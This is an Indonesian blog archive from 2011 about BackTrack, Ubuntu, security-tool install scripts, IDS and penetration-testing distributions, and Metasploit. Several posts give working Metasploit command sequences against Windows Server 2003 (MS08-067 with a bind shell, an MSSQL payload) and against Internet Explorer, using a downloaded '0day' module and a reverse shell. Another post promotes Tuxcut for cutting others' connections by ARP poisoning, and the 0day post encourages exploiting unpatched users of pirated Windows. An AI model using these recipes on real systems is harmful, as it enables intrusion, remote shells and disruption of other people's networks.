Saturday, April 30, 2011

Backtrack 5 segera dirilis


Berdasarkan info dari situs backtrack sendiri bahwa Backtrack 5 akan segera dirilis sebentar lagi,tanggal rilisnya adalah 10 Mei 2011,ada banyak perubahan yang akan terjadi pada Backtrack 5,hal itu bisa langsung kita lihat dari kode rilisnya yaitu "Revolution".

Pada Backtrack 5 basednya adalah Ubuntu Lucid (10.04 LTS) bukan 8.04 lagi,dan akan mendukung untuk komputer 32 dan 64 bit.Dan untuk desktop akan didukung oleh KDE 4,Gnome,dan Fluxbox untuk memenuhi keinginan para pecinta backtrack yang banyak ingin menggunakan Gnome dan KDE 4 sebagai Desktop Environment.Lebih seru lagi ISO dibedakan berdasarkan DE (Desktop Environtment) yang kita inginkan.

Untuk Source Code pihak Developer sendiri mengatakan akan menyertakan source code pada repository,agar menguatkan pandangan bahwa lisensi Backtrack bersifat Open-source dan dapat dikembangkan oleh komunitas.

Kalau sebelumnya pada backtrack 4 kita masih menemui aplikasi atau tools yang sudah sangat tidak relevan digunakan,maka pada Backtrack 5 aplikasi - aplikasi tersebut akan dihilangkan atau digantikan dengan aplikasi yang lebih mudah lagi penggunaanya.

Thursday, April 28, 2011

Dasar-dasar Backtrack


Memulai Backtrack,untuk memulai tampilan ketik startx pada terminal
Jika belum berhasil ada beberapa cara untuk dapat memulainya :

- Menggunakan konfigurasi default VESA: 
root@bt:~# fix-vesa
[*] Backing up xorg.conf to xorg.conf.orig
cp: cannot stat `/etc/X11/xorg.conf': No such file or directory
[*] Copying over xorg.conf-vesa to xorg.conf
[*] Please restart X
root@bt:~#
- Konfigurasi ulang paket X server

kita bisa meresetnya dengan mengetik perintah dibawah ini.
root@bt:~# dpkg-reconfigure xserver-xorg
- Konfigurasi default VESA(pada Vmware).
root@bt:~# fix-vesa-vmware 
[*] Backing up xorg.conf to xorg.conf.orig
[*] Copying over xorg.conf-vmware to xorg.conf
[*] Please restart X
root@bt:~#
- Merubah desktop environment dari KDE menjadi Fluxbox

kita bisa merubah KDE menjadi Fluxbox dengan menggunakan dragon.
root@bt:~# dragon
 2010 (C) Dragon v 0.1 - Back|Track Command Line Control Panel
 upgrade - Upgrade your Back|Track box
 follow - Install and Follow all Back|Track tools by Category
 ...
 dragon >> desktop fluxbox
 Selecting Fluxbox as default Desktop Manager
 dragon >> quit
 Good Bye
 root@bt:~#
restart komputer dan masuk kembali,untuk merubahnya menjadi dari fluxbox menjadi KDE lagi ketik "desktop kde"

- Terhubung dengan jaringan

   - Setting IP secara manual

untuk mensetting ip secara manual ikuti perintah dibawah ini,misalkan kita ingin menggunakan ip 192.168.1.112/24 dengan default gateway dan DNS server 192.168.1.1
root@bt:~# ifconfig eth0 192.168.1.112/24
root@bt:~# route add default gw 192.168.1.1
root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf
agar setiap konfigurasi yang telah kita atur tidak hilang editlah pada file /etc/network/interfaces dan ubahlah seperti dibawah ini
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
        address 192.168.1.112
        netmask 255.255.255.0
        network 192.168.1.0
        broadcast 192.168.1.255
        gateway 192.168.1.1
savelah file tersebut dan ketik perintah dibawah ini
root@bt:~# update-rc.d networking defaults
root@bt:~# /etc/init.d/networking restart
   - IP dengan DHCP

gunakann perintah dhclient untuk mendapatkan ip address secara otomatis
root@bt:~# dhclient eth0
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Listening on LPF/eth0/00:0c:29:81:74:21
Sending on   LPF/eth0/00:0c:29:81:74:21
Sending on   Socket/fallback
DHCPREQUEST of 192.168.1.112 on eth0 to 255.255.255.255 port 67
DHCPACK of 192.168.1.112 from 192.168.1.1
bound to 192.168.1.112 -- renewal in 37595 seconds.
root@bt:~#

Ubuntu 11.04 Natty Narwhal versi final telah dirilis

Setelah versi sebelumnya Ubuntu 10.10 (Maverick Meerkat) dirilis,kembali lagi ubuntu versi 11.04 Natty Narwhal dirilis pada tanggal 28 april 2011,ada beberapa perbedaan dengan versi sebelumnya,yang paling mencolok adalah :

- Launcher pada desktop

Kalau versi sebelumnya diinstall tanpa launcher yang mirip dengan docky,maka pada versi 11.04 sudah kita dapatkan sewaktu menginstall pertama kali.

- Dash

Terdapat Dush yang juga dipaketkan pada installan pertama,memudahkan kita membuat shortcut untuk banyak aplikasi.

- Workspaces

Workspaces dapat diakses dengan mudah,karena dapat langsung ditampilkan secara bersamaan.

Untuk Mendownload ISO Natty Narwhal klik disini.

Wednesday, April 27, 2011

Script instalasi alat-alat keamanan di Ubuntu

infondlinux adalah konfigurasi post script untuk Ubuntu Linux. Menginstall alat keamanan dan add-ons. Tools diinstal oleh script tercantum dalam kode sumber.

# Download:
$ Wget http://infondlinux.googlecode.com/svn/trunk/infondlinux.sh

# Install:
$ sudo infondlinux.sh

Pakages:

# Debian packages
# - Imagemagick
# - Vim
# - Less
# - Gimp
# - Build-essential
# - Wipe
# - Xchat
# - Pidgin
# - Vlc
# - Nautilus-open-terminal
# - Nmap
# - Zenmap
# - Sun-java6-plugin et et jdk jre
# - Bluefish
# - Flash-plugin-nonfree
# - Aircrack-ng
# - Wireshark
# - Ruby
# - Ascii
# - WebHTTrack
# - Socat
# - Nasm
# - W3af
# - Subversion
# - Wireshark
# - Mercurial
# - Libopenssl-ruby
# - Ruby-gnome2
# - Traceroute
# - Filezilla
# - Gnupg
# - Rubygems
# - Php5
# - Libapache2-mod-php5
# - Mysql-server
# - Php5-mysql
# - Phpmyadmin
# - Extract
# - P0f
# - Spikeproxy
# - Ettercap
# - Dsniff:
# * Arpspoof - send out unrequested (and possibly forged) arp replies.
# * Dnsspoof - forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
# * Dsniff - password sniffer for Several protocols.
# * Filesnarf - saves selected files sniffed from NFS traffic.
# * Macof - flood the local network with random MAC addresses.
Mailsnarf # * - sniffs mail on the LAN and stores it in mbox format.
# * Msgsnarf - record selected messages from different Instant Messengers.
# * Sshmitm - SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
# * Sshow - SSH traffic analyzer.
# * Tcpkill - kills specified in-progress TCP connections.
# * Tcpnice - slow down specified TCP connections via â € € œactiveâ traffic shaping.
# * Urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.
# * Webmitm - HTTP / HTTPS monkey-in-the-middle. transparently proxies.
# * WebSpy - sends URLs sniffed from a client browser to your local
# - Unrar
# - Torsocks
# - Secure-delete
# - Nautilus-gksu
# - SqlMap
# - John the ripper

# Third party packages
# - Tor
# - Tor-geoipdb
# - Virtualbox 4.0
# - Google-chrome-stable

# Manually downloaded software and version
# - DirBuster (1.0RC1)
# - TrueCrypt (7.0a)
# - Metasploit framework (3.6)
# - WebScarab (latest)
# - Burp suite (01/03/2003)
# - Parosproxy (3.2.13)
# - Jmeter (2.4)
# - Rips (0.35)
# - Origami-pdf (latest)
# - Pdfid.py (0.0.11)
# - Pdf-parser.pym (0.3.7)
# - Fierce (latest)
# - Wifite (latest)
# - Pylori (3.2)
# - Skipfish (1.86 beta)
# - Hydra (6.2)
# - Maltego (3.0)
# - Set
# - Volatilty (1.3 beta)

# Home made scripts
# - Hextoasm
# - Md5crack.py (written by Corbiere)
# - Chartoascii.py
# - Asciitochar.py
# - Rsa.py

# Firefox extensions
# - Livehttpheaders
# - Firebug
# - Tamperdata
# - Noscript
# - Flashblock
# - FlashGot
# - FoxyProxy
# - Certificatepatrol
# - Chickenfoot 1.0.7

Source: http://www.thehackernews.com/2011/04/infondlinux-security-tools-install.html

kemanan linux dan monitor jaringan


Insta-snorby

Aplikasi ini dirancang untuk pengguna yang ingin menguji Snorby (a Snort baru IDS front-end) atau memerlukan mendesah cepat dan mendengus sensor diinstal.
Muncul dengan:

* Snort 2.9.0.3 - Versi terbaru dari Intrusion Detection System populer
* Lumbung 2,19 - Sebuah aplikasi yang deciphers unified2 Snort log dan menempatkan mereka di snorby database
* Snorby 2.2.1 - A front-end IDS
* OpenFPC - Monitoring capture paket penuh
* Diambil Pork 0,5 - update manajemen aturan IDS

Proses instalasi akan memandu Anda melalui mengkonfigurasi server MySQL dan meminta Anda untuk memakai Anda "Oinkcode" yang secara otomatis akan mendownload aturan VRT terbaru (di signature bahwa kekuatan IDS) Sourcefire. Aturan ancaman yang muncul (aturan lain distro populer) telah diunduh dan diaktifkan.

http://www.snorby.org/

Smooth-Sec

Smooth-Sec adalah siap-pergi IDS / IPS (Intrusion Detection / Prevention System) distribusi Linux berbasis pada multi threaded Suricata IDS / IPS dan Snorby, baris pertama dari aplikasi web untuk pemantauan keamanan jaringan. Smooth-Sec dibangun di Ubuntu LTS 10.04 turnkey basis Core menggunakan sebagai platform pengembangan. Fungsi adalah titik kunci yang dapat mengimplementasikan IDS lengkap / sistem IPS dipasang dan bekerja di luar kotak dalam hitungan menit, bahkan untuk pemula dengan pengalaman minimal keamanan Linux.

http://bailey.st/blog/smooth-sec/

Siem-live

Siem-hidup adalah pergi-ke Siem (Keamanan Informasi dan Event Management) berdasarkan alat Open Source, dan Debian-hidup. Untuk mengumpulkan peristiwa dia menggunakan Suricata IDS / IPS, syslog kolektor sebagai openv pusat untuk mencari kerentanan, dan banyak lainnya. Tanda dan peristiwa disimpan dalam Open Source Siem Prelude, dianalisis dan berkorelasi. Hasilnya akan dapat diakses melalui antarmuka web (Prewikka).

Siem-hidup adalah bootable LiveCD, yang menawarkan sistem berfungsi penuh tanpa konfigurasi yang diperlukan. Dia juga bisa menggunakan ketekunan, atau dapat diinstal pada hard drive / kunci USB.

Tujuan Anda adalah untuk memberikan cara mudah untuk menerapkan dan menguji Siem, dan dapat dengan cepat melihat apa yang terjadi pada jaringan dan fokus pada mencoba untuk mendeteksi pola korelasi tingkat tinggi. Hal ini juga berisi visualisasi dan alat pelaporan dalam waktu dekat.

https: / / www.wzdftpd.net / Redmine / proyek / Siem-live

Keamanan LiveDVD Bawang

Keamanan Bawang LiveDVD adalah DVD bootable yang berisi perangkat lunak yang digunakan untuk konfigurasi, instalasi dan pengujian Intrusion Detection Systems. Hal ini didasarkan pada Xubuntu 10,04 dan berisi Snort, Suricata, Sguil, Squert, Xplico, nmap, metasploit, Armitage, Scapy, Hping, tcpreplay netcat, dan banyak alat-alat keamanan lainnya.

http://securityonion.blogspot.com/

Network Security Toolkit

Jaringan Security Toolkit (NST) adalah Linux Live CD, yang menawarkan seperangkat alat-alat keamanan komputer dan open source jaringan untuk melakukan rutin dan keselamatan kerja dan diagnostik jaringan dan pemantauan. Distribusi ini dapat digunakan sebagai analisis keamanan jaringan, validasi dan alat pemantauan untuk server mesin virtual host tersebut. Fitur lain termasuk visualisasi ntop, wireshark traceroute, data geolocation kismet dan alamat host, percakapan IPv4, data traceroute dan titik akses nirkabel dan menampilkan mereka melalui Google Earth atau World Map gambar Mercator bit , sebuah capture paket sistem, browser berbasis dan analisis protokol mampu memantau hingga empat antarmuka jaringan dengan menggunakan Wireshark, serta sistem deteksi intrusi berdasarkan Snort dengan "kolektor" backend yang menyimpan insiden dalam database MySQL database

http://www.networksecuritytoolkit.org/

EasyIds

EasyIDS merupakan open source IDS (Intrusion Detection System) distribusi berbasis Snort. Dibangun di CentOS dan dikelola dari satu EasyIDS manajemen antarmuka berbasis web mengambil rasa sakit dan frustrasi menerapkan sistem deteksi intrusi.

Dirancang untuk pemula keamanan jaringan dengan pengalaman minimal Linux EasyIDS dapat mengkonversi hampir semua komputer standar industri x86 dan menjalankan sistem untuk deteksi intrusi di bawah 15 menit. EasyIDS mengurangi biaya penyebaran dan pemeliharaan keamanan jaringan tanpa mengorbankan fungsionalitas atau kinerja.

http://www.skynet-solutions.net/easyids/

Install Social Engginer Toolkit (SET) di Ubuntu

What is This ?

SET(Social Engginer Toolkit) adalah alat penetrasi jaringan yang banyak manfaatnya,SET dikeluarkan oleh http://www.social-engineer.org source codenya ditulis oleh David Kennedy (ReL1K) dibantu sesama komunitas hacker,dan saat ini menjadi alat yang lumayan banyak digunakan.

Cara install :

Tambahkan repository Backtrack kedalam Ubuntu,kemudian dari Synaptic Package Manager install SET.
Install pexpect-2.3.tar.gz
# wget http://pexpect.sourceforge.net/pexpect-2.3.tar.gz
# tar xzf pexpect-2.3.tar.gz
# cd pexpect-2.3
# sudo python ./setup.py install
Install BeautifulSoup
# wget http://www.crummy.com/software/BeautifulSoup/download/3.x/BeautifulSoup-3.0.8.1.tar.gz
# tar -xzvf BeautifulSoup-3.0.8.1.tar.gz
# cd BeautifulSoup-3.0.8.1/
# sudo python ./setup.py install
Commands : 
# cd /pentest/exploits/SET
# ./set

Exploit Windows Server 2003 R2

What is This ?

Kembali mencari exploit dan akhirnya mendapatkan exploit Windows Server 2003 R2,perbedaannya pada Windows Server sebelumnya adalah pada Payloadnya,^^


Guide :

> Gunakan Nmap untuk mengetahui versi Windows.
> Gunakan Metasploit untuk melakukan Exploit.

What do i need ?

> Nmap -- on Backtrack 4 R2
> Metasploit -- on Backtrack 4 R2

Commands :

# msfconsole
# use exploit/windows/smb/ms08_067_netapi
# set payload windows/shell_bind_tcp
# set RHOST IP_TARGET
# set TARGET 8
# exploit

Exploit Windows Server 2003

What is This ?

Artikel sebelumnya saya pernah menulis Exploit Windows 7,Vista,dan Server 2008 yang memiliki file SRV2.SYS,kali ini kita akan melakukan Exploit pada Windows Server 2003 SP 1,Semoga Beruntung..


Guide :

> Gunakan Nmap untuk mengetahui versi Windows.
> Gunakan Metasploit untuk melakukan Exploit.

What do i need ?

> Nmap -- on Backtrack 4 R2
> Metasploit -- on Backtrack 4 R2

Commands :
# use exploit/windows/mssql/mssql_payload
# set payload windows/shell/bind_tcp
# set RHOST IP_TARGET
# exploit

Jenis Distro Hacking

What is This ?

Saat ini banyak sekali distribusi Linux khusus untuk Penetrating System/Hacking,selain distro Backtrack yang sering kita gunakan ternyata masih banyak lagi distro serupa yang muncul akibat dari kebutuhan yang berbeda-beda dari setip pengguna,selain itu juga tentu saja untuk mencari distro paling solid dan stabil.

Semoga dengan adanya artikel ini membantu anda untuk menemukan distro yang cocok dengan kebutuhan anda,dan jika ada memiliki masukan tentang distro yang lain saya menunggu masukannya. Contact : gilakomputer@gmail.com.


BackTrack

Selamat Datang di backtrack-linux.org, rumah bagi keamanan distribusi Linux terbesar sejauh ini. BackTrack merupakan gudangnya program berdasarkan penetrasi, yang membantu profesional keamanan kemampuan untuk melaksanakan penilaian dalam lingkungan,dan tentu saja asli dan murni didedikasikan untuk pembajakan. Terlepas jika Anda membuat BackTrack sistem operasi utama Anda, booting dari LiveDVD, atau menjadi favorit Anda, BackTrack telah disesuaikan untuk setiap jenis paket, script konfigurasi kernel, dan patch semata-mata untuk tujuan pengujian penetrasi .
BackTrack ditujukan untuk semua pemirsa dengan profesional keamanan yang paling berpengalaman untuk pendatang baru di bidang keamanan informasi. BackTrack mempromosikan cepat dan mudah untuk menemukan dan update database terbesar kumpulan alat keamanan.
http://www.backtrack-linux.org


GnackTrack

GnackTrack adalah LiveCD (dan diinstal) distribusi Linux dirancang untuk menguji penetrasi dan didasarkan pada Ubuntu.
GnackTrack adalah distribusi pengujian penetrasi untuk para penggemar Gnome.
Banyak dari kita telah mendengar BackTrack, masih menggunakan KDE. Banyak orang lebih memilih distribusi berbasis Gnome, dan dengan demikian lahir GnackTrack. GnackTrack awalnya diciptakan dengan menambahkan Gnome di BackTrack dan kupas atas bagian dari KDE, tapi ini sangat disayangkan, Ada banyak cruft left sehingga diputuskan untuk membangun sebuah penetrasi cd gnome berdasarkan dari awal.
Karena Ubuntu adalah salah satu distribusi yang paling populer, masuk akal untuk GnackTrack, terutama karena 10.04LTS akan memiliki dukungan jangka hidup.
olah karena itu mengapa distro ini disebut GnackTrack (Gnome + Backtrack),menurut saya GnackTrack kurang profesional karena masih menggunakan repo dari Backtrack tanpa ada timbal baliknya dari GnackTrack,sehingga membuat kecewa Orang yang membuat Backtrack.
http://www.gnacktrack.co.uk


NodeZero

NodeZero adalah Ubuntu Linux yang dirancang sebagai sebuah sistem lengkap yang juga dapat digunakan untuk pengujian penetrasi. NodeZero menggunakan Ubuntu repositori agar sistem anda selalu diperbarui. Konfigurasi sistem sangat penting dan terutama ditujukan untuk instalasi dan kustomisasi dari disk yang Anda inginkan. NodeZero dilengkapi dengan lebih dari 300 alat untuk pengujian penetrasi dan satu set layanan inti yang diperlukan untuk pengujian penetrasi. mereka juga menyiapkan alat repositori agar sistem anda diperbarui setiap saat.
http://netinfinity.org

Samurai Web Testing Framework

Samurai Web Testing Framework adalah linux lingkungan hidup yang telah pra-dikonfigurasi untuk berfungsi sebagai pen-test environment web. CD berisi aplikasi terbaik dari open source dan tools gratis yang berfokus pada pengujian dan menyerang website. Dalam pengembangnya distribusi ini, Samurai Web Testing Framework didasarkan pada seleksi tools/alat yang paling sering digunakan dalam praktik keamanan. Samurai Web Testing Framework menyertakan alat-alat yang digunakan dalam semua empat tahapan web-pen test.
http://samurai.inguardians.com/

Hacking Live CD

Hacking Live CD adalah salah satu distribusi Linux yang diisi dengan alat-alat baru dan utilitas untuk ethical hacking, penetration testing and verification countermeasure. Berdasarkan Ubuntu livecd dan dijalankan seperti "berjalan langsung dari CD dan tidak memerlukan instalasi pada hard drive Anda Setelah dimulai. Anda bisa menggunakan alat termasuk untuk test, verify, ethically hack dan perform penetration tests pada jaringan Anda sendiri untuk memastikan dia aman dari penyusup luar.
http://www.livehacking.com/live-hacking-cd

Pentoo

Pentoo adalah Live CD dan Live USB dirancang untuk menguji penetrasi dan evaluasi keamanan. Basednya adalah Gentoo Linux, Pentoo memiliki versi 32 dan 64 bit livecd. Memiliki driver injeksi paket update Wi-Fi, GPGPU perangkat lunak cracking [2], dan banyak alat untuk pengujian penetrasi dan evaluasi keamanan.
http://www.pentoo.ch/


Network Security Toolkit

Selamat datang di Network Security Toolkit (NST). ISO ini bootable live CD / DVD (Live NST) didasarkan pada Fedora. Manual ini dirancang untuk memberikan akses mudah ke best-of-breed Aplikasi Sumber Terbuka, Keamanan Jaringan dan berjalan pada platform yang paling x86/x86_64.
http://www.networksecuritytoolkit.org/nst/


OWASP Live CD

OWASP LiveCD, merupakan proyek yang menyatukan beberapa proyek terbaik dari keamanan open source dalam CD tunggal. Web developer, tester dan profesional keamanan dapat mulai dari LiveCD ini dan memiliki akses ke set lengkap uji keselamatan. Hal ini memungkinkan pengguna Anda untuk menguji berbagai masalah keamanan aplikasi web dan situs web.
http://appseclive.org

Arudius

Arudius adalah Linux liveCD dengan alat-alat untuk pengujian penetrasi dan analisis kerentanan. Apa yang disebut "Linux liveCD" pada dasarnya adalah sistem operasi Linux, yang dinyalakan dan dijalankan langsung dari CD-ROM standar. Hal ini memungkinkan untuk meningkatkan portabilitas dan sistem operasi untuk menjalankan berbagai perangkat lunak Linux di hampir semua sistem fisik tanpa mempengaruhi sistem host operasi yang terpasang pada hard disk. Ini adalah konsep yang menggali Arudius juga. Saat ini, Arudius memiliki alat keamanan yang lebih dari 140 dan pengemasan yang berbeda
http://www.tdisecurity.com/tdi-labs/arudius.htm

WeakNet

WeakNet Linux, dirancang terutama untuk pengujian penetrasi, forensik dan tugas-tugas keamanan lainnya. Lingkungan desktop default adalah GNOME.
http://weaknetlabs.com/main/

Backbox

Backbox adalah distribusi Linux berbasis Ubuntu LTS 10.04 Lucid dirancang untuk melakukan tes penetrasi dan penilaian keamanan. Dirancang untuk menjadi cepat, mudah digunakan dan minim,tetapi belum lengkap karena repositori sendiri perangkat lunak desktop selalu upgrade ke versi stabil terbaru dari alat terbaik dikenal dan paling sering digunakan etical hacking.
www.backbox.org/public/

Matriux

Matriux adalah distribusi keamanan dengan semua sumber daya yang terdiri dari banyak open source yang kuat dan tools gratis yang dapat digunakan untuk berbagai tujuan, termasuk namun tidak terbatas pada, penetration testing, ethical hacking, system and network administration, cyber forensic investigations, security testing, vulnerability analysis, dan banyak lagi. Ini adalah distribusi dirancang bagi para profesional keamanan dan penggemar, walaupun biasanya dapat digunakan sebagai sistem desktop default Anda. Dengan Matriux, Anda dapat mengubah sistem apapun menjadi kuat set alat untuk pengujian penetrasi, tanpa harus menginstal perangkat lunak apapun pada hardisk Anda. Matriux dirancang untuk bekerja dalam lingkungan hidup sebagai tongkat, CD / DVD atau USB atau dapat dengan mudah diinstal pada hard drive anda dalam beberapa langkah. Matriux juga mencakup seperangkat alat untuk forensik komputer dan pemulihan data yang dapat digunakan untuk analisis forensik dan penelitian dan pemulihan data.
http://www.matriux.com

Secmic

Secmic adalah liveCD keamanan distribusi Linux yang dapat digunakan oleh profesional keamanan atau untuk tujuan pendidikan. Hal ini gratis untuk men-download, dan selalu akan. Ini terdiri dari lebih dari 200 aplikasi keamanan yang berorientasi dan menjaga open source Ubuntu / Kubuntu update kompatibilitas, berarti Anda akan dapat menerima update keamanan langsung dari repositori Ubuntu / Kubuntu.
http://sourceforge.net/p/secmic/home//index.html

Distribusi alat-alat keamanan

DTS adalah berbasis Linux Security Tool. Memang, itu adalah kumpulan dari ratusan bahkan ribuan alat keamanan untuk open source. Ini adalah distro Linux LiveCD, yang berarti berjalan dari CD di memori tanpa mengubah sistem operasi asli dari komputer host. Satu-satunya tujuan dalam hidup adalah untuk menempatkan sebagai alat keamanan banyak yang Anda inginkan.
http://s-t-d.org

NetSecL

NetSecL Linux adalah dengan setup default dengan distribusi meninggalkan mengeras ke tingkat keamanan yang masih digunakan dan menyediakan peralatan yang diperlukan untuk menguji keamanannya. GrSecurity firewall dan itu merupakan ciri yang membuat distribusi eksklusif dengan paket dibangun khusus: Amap, ettercap, Hydra, Kismet, Nessus, Nmap, Metasploit, PADS.
http://netsecl.linuxfreedom.com

VAST

VAST adalah VIPER distribusi laboratorium yang berisi alat VIPER hidup dikembangkan sebagai UCsniff, videosnarf videojak, dan banyak lagi. Seiring dengan alat VIPER dan alat-alat lain keamanan penting VoIP, juga berisi alat untuk penguji penetrasi digunakan sebagai Metasploit, Nmap dan Hydra.é distribusi pekerjaan yang sedang berjalan.
http://vipervast.sourceforge.net

Blackbuntu

Blackbuntu adalah distribusi pengujian penetrasi yang telah dirancang khusus untuk mahasiswa dan pelatihan keamanan informasi keamanan profesional.
Blackbuntu adalah distribusi pengujian penetrasi dengan GNOME Desktop Environment. Saat ini sedang dibangun menggunakan Ubuntu 10.10 dan bekerja referensi pada Back | Track. Itu dibuat hanya untuk sebagai hobi saja.
http://www.blackbuntu.com/

PHLAK

PHLAK atau [P] rofessional [H] Acker's [L] inux [A] ssault [K] itu adalah keamanan modular dari distribusi Linux (aka LiveCD). PHLAK dilengkapi dengan dua lingkungan (fluxbox dan xfce4), alat-alat keamanan banyak, dan buku catatan penuh dokumentasi keamanan. PHLAK adalah turunan dari Morphix, dibuat oleh Alex de Landgraaf.

Terutama di sekitar Penetrasi Testing, PHLAK adalah sistem yang setiap hacker atau pentest harus dimiliki.
http://sourceforge.net/projects/phlakproject/
Download versi terbaru 0,3 - ftp://ftp.ussg.iu.edu/linux/phlak/phlak-0.3.iso>

STD 0.1

STD adalah berbasis Linux Security Tool. Memang, itu adalah kumpulan dari ratusan bahkan ribuan alat keamanan untuk open source. Ini adalah Live Linux Distro, yang berarti berjalan dari CD di memori tanpa mengubah sistem operasi asli dari komputer host. Satu-satunya tujuan dalam hidup adalah untuk menempatkan sebagai alat keamanan banyak yang Anda inginkan dengan mudah menggunakan antarmuka.
DST adalah untuk digunakan baik oleh pemula dan admin keamanan profesional tetapi tidak ideal bagi Pengguna yang belum pernah menggunakan Linux. DST mengasumsikan Anda tahu dasar-dasar Linux karena sebagian besar karyanya akan dilakukan dari baris perintah. Jika Anda benar-benar baru untuk Linux, Anda sebaiknya mulai dengan distro hidup seperti Knoppix untuk berlatih dasar-dasar.
DTS dirancang untuk membantu administrator jaringan dan profesional melindungi jaringan mereka
http://s-t-d.org/index.html

nUbuntu

nUbuntu atau Network Ubuntu adalah jauh lebih seorang pemula di arena sebagai LiveCD Ubuntu, yang didasarkan, cukup baru sendiri.
Tujuan utama dari nUbuntu adalah untuk membuat distribusi yang berasal dari distribusi Ubuntu, dan menambahkan paket yang terkait dengan pengujian keamanan, dan menghapus paket yang tidak diperlukan, seperti Gnome, Openoffice.org, and Evolution. nUbuntu merupakan hasil dari ide dua orang harus membuat distribusi baru untuk pengalaman belajar.
http://www.nubuntu.org/

Jadi Distro manakah yang pas untuk kamu ?

GnackTrack - Gnome Based Penetration Distro

What is This ?

GnackTrack adalah distro baru yang ikut mengkhususkan diri pada penetration Testing seperti halnya Backtrack dan Backbox,dirilis pada akhir april 2010 untuk versi ALPHA3-BETA1 dan sekarang sudah mencapai versi GnackTrack R3.

GnackTrack dirilis dengan menggunakan desktop environment GNOME dan itulah yang membuat berbeda dengan Backtrack yang menggunakan KDE sebagai desktop Environment,tools yang terdapat pada GnackTrack tidak jauh berbeda dengan Backtrack,jadi bagi anda yang bosan dengan KDE pada Backtrack mungkin Distro ini bisa menjadi solusi.
Download :

http://www.gnacktrack.co.uk/download.php

Netcut untuk Linux (Tuxcut)

Tuxcut, aplikasi untuk memotong akses internet pada jaringan baik hot spot maupun workgroup,dengan memanfaatkan protokol ARP untuk mengirimkan ARP Poisoning.Diambil dari situs resminya http://bitbucket.org/a_atalla/tuxcut/src/

Tuxcut dibuat menggunakan bahasa pemograman PyQt.
Kelebihan Tuxcut dari aplikasi sejenis seperti Netcut adalah dilengkapi fitur untuk memproteksi diri ditambah mac scanning dan mac changer.Berikut adalah tahap instalasi Tuxcut pada Ubuntu.

- Install arp-scan dengan perintah :
$ sudo apt-get install arp-scan
- Install dsniff dengan perintah :
$ sudo apt-get install dsniff
- Install library
$ sudo apt-get install -f
- Install arptables, download versi arptables terbaru di http://sourceforge.net/projects/ebtables/files/arptables/
$ wget http://sourceforge.net/projects/ebtables/files/arptables/arptables-v0.0.3/arptables-v0.0.3-4.tar.gz
$ tar zxf arptables-v0.0.3-3.tar.gz
$ cd arptables-v0.0.3-3
$ sudo make && make install
- Install TuxCut dengan perintah
$ wget http://bitbucket.org/a_atalla/tuxcut/downloads/TuxCut-3.2_all.deb
$ sudo dpkg -i TuxCut-3.2_all.deb

UPDATE : Backtrack 5 R1
kalau agan-agan pake Backtrack 5 R1 pas jalanin Tuxcut ada yang Error dengan pesan

Connection Error","you are not connected to any network,TuxCut will Quit

atau

arping: invalid option -- 'f'

cara untuk memperbaikinya adalah
root@bt:~# apt-get autoremove arping
root@bt:~# apt-get install iputils-arping
root@bt:~# apt-get install python-scapy

Bug pada hotmail

What is this ?

Percaya ngak percaya hotmail memiliki bug,tetapi terakhir penulis mencobanya sudah tidak bisa lagi,mungkin sudah dipatch,^^
tapi jangan berkecil hati,penulis mendapatkan videonya pada situs vimeo,yang diupload oleh kk bhior dari brazil,^^



Video :



Bug no correio eletrônico "Hotmail" from Bhior on Vimeo.

Armitage - GUI untuk Metasploit

What is This ?

Armitage adalah sebuah aplikasi Exploits yang berbasis GUI yang dapat diintegrasikan dengan aplikasi Metasploit untuk memproyeksikan target dalam gambar dan diuraikan secara detail,dan sangat mudah dimengerti bagi kalangan yang profesional dibidang exploitasi dan hacking.Bagi para pemula juga akan mudah untuk mempelajarinya dibantu dengan tutorial yang ada.

Tutorial : 
http://www.fastandeasyhacking.com/manual

Video :
http://www.youtube.com/watch?v=kdtMthVeC1M
http://www.youtube.com/watch?v=EACo2q3kgHY

Screenshot : 
http://www.fastandeasyhacking.com/images/screenshots/launch.png
http://www.fastandeasyhacking.com/images/screenshots/armitage4.png

Download : 
http://www.fastandeasyhacking.com/download

Metasploit Unleashed : 
http://www.offensive-security.com/metasploit-unleashed/Armitage
Instalasi: http://www.offensive-security.com/metasploit-unleashed/Armitage_Setup
Scanning: http://www.offensive-security.com/metasploit-unleashed/Armitage_Scanning
Eksplorasi: http://www.offensive-security.com/metasploit-unleashed/Armitage_Exploitation

Source :
http://www.fastandeasyhacking.com/

Exploit pada Vulnerability Internet Explorer 6,7,8

What is this ?


Vulnerability masih baru atau 0day sampai saat ini,karen pihak vendor atau developer masih belum mengeluarkan patch terhadap produk mereka,3;)



Guide :

> Gunakan Metasploit untuk melakukan exploit.
> Tambahkan exploit  ms10_xxx_ie_css_0day.rb

What do i need ?

> Metasploit -- on Backtrack 4 R2
> ms10_xxx_ie_css_0day.rb dari HotFile,Ziddu,dan Fileserve.

Commands :
msfconsole
use  modules/exploits/windows/browser/ms10_xxx_ie_css_0day.rb
set payload windows/shell_reverse_tcp
set SRVHOST IP_KITA
set SRVPORT 80
set URIPATH /
set LHOST IP_KITA
exploit
sessions – i 1

0day atau ZeroDay

What Is This ?

Zeroday atau 0day merupakan suatu keadaan dimana sebuah vulnerability yang ditemukan pada sebuah aplikasi,dan pihak vendor atau developer belum mengeluarkan patch untuk aplikasi tersebut untuk mencegah terjadinya tindakan exploitasi.

Banyak Aplikasi yang masih mempunyai vulnerability berstatus 0day,contoh kecil vulnerability berstatus 0day didalam blog ini adalah pada aplikasi QuickTime 7.6.7 , Adobe Reader 9.3.4 dan internet explorer 6,7,8.Sehingga kegiatan exploit sanggat mungkin dilakukan ditambah banyaknya pengguna windows yang menggunakan program bajakan(masih jaman ngebajak,^^) enggan untuk melakukan update karena kuatir akan ketahuan oleh pihak microsoft,jadi selama masih berstatus 0day mari kita Berexploit ria,upss.. saling menjaga maksudnya khususnya bagi penguna wendus,hihi..

Exploit Linux

What is this ?

